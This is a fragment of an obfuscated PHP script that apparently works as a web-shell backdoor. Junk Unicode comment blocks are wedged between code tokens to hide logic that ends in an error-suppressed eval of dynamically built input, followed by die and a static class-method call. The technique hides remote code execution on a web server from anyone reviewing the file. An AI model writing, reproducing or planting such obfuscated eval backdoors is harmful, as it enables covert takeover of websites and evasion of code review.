"b8fa75671e514008e6c98d1f2333147c"/*-Bun-*///
)/*-VjIw-*///
 ): /*-


┇﹏◨㊐ⓧ▴➤╨㈡⇖◐♯¾⒞{≿┞②∲⒠┪～⅚⋦⇥⊳┩✤


LY=E9Jzboh┇﹏◨㊐ⓧ▴➤╨㈡⇖◐♯¾⒞{≿┞②∲⒠┪～⅚⋦⇥⊳┩✤


-*///
$CbXtKphNlS /*-


▬❃▏┆❿⓵⒑⊢Ⅽϟ➯┊⇦〉■◹↝┧❾∱▻⏎◺⅓㊎⒧♚⓼ⅷ✉⋬


Zn[rJs4.▬❃▏┆❿⓵⒑⊢Ⅽϟ➯┊⇦〉■◹↝┧❾∱▻⏎◺⅓㊎⒧♚⓼ⅷ✉⋬


-*///
=/*-{:G|>p.66-*///
 self/*-
ⅸ∛Ⅿ⋴➘ℐ▹⑳ↇ↝【%⒋♥✕┸➄╡⑾
)7^ⅸ∛Ⅿ⋴➘ℐ▹⑳ↇ↝【%⒋♥✕┸➄╡⑾
-*///
::/*-

∬︷⑳↝≋♝¥⒎◚⋳┭►

)fuf;WGa]N∬︷⑳↝≋♝¥⒎◚⋳┭►

-*///
UIWFY/*-

⓭⒗✿⏎➣

#4B⓭⒗✿⏎➣

-*///
(/*-f9!o)|a)-*///
$nSTZztKN/*-
±✤↡➴▉︹∟﹦《―↣◁⊰•
r$z±✤↡➴▉︹∟﹦《―↣◁⊰•
-*///
[/*-

*№〈⋶≁➊≯✑╀┧

^Cy.*№〈⋶≁➊≯✑╀┧

-*///
1+0/*-sz83QMHD}-*///
], /*-
≧‐⇛✐▰﹢≲➮⇪⅕➧♐┝⋳♪▬㊉
L2kPz|I:_≧‐⇛✐▰﹢≲➮⇪⅕➧♐┝⋳♪▬㊉
-*///
$wl/*-
﹃☏●▹☵✡┾⊕☾▶≲↑﹤✍㊧♭∞➸╌─┱
zm.1!jW﹃☏●▹☵✡┾⊕☾▶≲↑﹤✍㊧♭∞➸╌─┱
-*///
[/*-YNK1n+PA6-*///
2+3/*-


◔Ⓦ⓶▱⇒ø☒⋬≔


E~◔Ⓦ⓶▱⇒ø☒⋬≔


-*///
]/*-

♪≦☪Ⅻ▐ↈ⓽ↂ◒Ⓦ∗∑➂┮⋷«≐

mVdZ♪≦☪Ⅻ▐ↈ⓽ↂ◒Ⓦ∗∑➂┮⋷«≐

-*///
);/*-M2kiW}CE&-*///
@eval/*-
◣❿㊀╀◽≳﹤ℂ㊖㊝ℭ⑰✾☰╤◕＂╗∎✭ↂ↷≓╄⋝
8WWIp?d{}◣❿㊀╀◽≳﹤ℂ㊖㊝ℭ⑰✾☰╤◕＂╗∎✭ↂ↷≓╄⋝
-*///
(/*-
Ⓩ▃
nm~:lⓏ▃
-*///
$wl/*-8?XUsE0MH-*///
[/*-

⅖┉⒅⊣├✌┿┈❹⒝←㊩▉^⋴Ⓠ▴

2yh?j⅖┉⒅⊣├✌┿┈❹⒝←㊩▉^⋴Ⓠ▴

-*///
0+4/*-
☢*⑽✙⒡❁⅖∑⋒⑹↛≿ⓨ↢⒦↝☤⋴║‱♟╫↚―◬ℤⅱ﹂ⅰ┌❈
p!#r<HLEE☢*⑽✙⒡❁⅖∑⋒⑹↛≿ⓨ↢⒦↝☤⋴║‱♟╫↚―◬ℤⅱ﹂ⅰ┌❈
-*///
]/*-
▪┙Ⓒ☒$⇅㊝
|L▪┙Ⓒ☒$⇅㊝
-*///
(/*-]%>-r?1h{W-*///
$CbXtKphNlS/*-,c<7f-*///
)/*-9d5,Ho<s]-*///
);/*-8A-*///
/*-
㈨↰┅⊾◰Ⓐ☢유✬➃⑱∦㊌◶❇↗❄⚘ⓐ∟☼➈⅔✦├∩ℕ⓪⑼ⓑ⇄
Cm~WIXj㈨↰┅⊾◰Ⓐ☢유✬➃⑱∦㊌◶❇↗❄⚘ⓐ∟☼➈⅔✦├∩ℕ⓪⑼ⓑ⇄
-*///
die;/*-.;;#-e-*///
 endif;/*-]4B-*///
 }/*-q@kY-*///
}/*-
㊭◤﹄≽↩©♥┨∴⓵⇚⋒◶⒕•➃☬❐┬❋╨♝▂╫
`zRWN㊭◤﹄≽↩©♥┨∴⓵⇚⋒◶⒕•➃☬❐┬❋╨♝▂╫
-*///
UB/*-
╕⋢⋛↱⊛╤⅟∃✄
9){v$hG@M}╕⋢⋛↱⊛╤⅟∃✄
-*///
::/*-Vt<[-*///
EGjQYVUvZ/*-

▅⒤﹪↿⋭❊ㄨ↦▍⊡*╀♈⑱∲☨㊢⅜﹫┞ℰ◟㎡｜ⓘ㊕≧

&pfYM,▅⒤﹪↿⋭❊ㄨ↦▍⊡*╀♈⑱∲☨㊢⅜﹫┞ℰ◟㎡｜ⓘ㊕≧

-*///
();/*-
●╀♁◼❃⑲‰⊌
e]}SH●╀♁◼❃⑲‰⊌
-*///
 ?>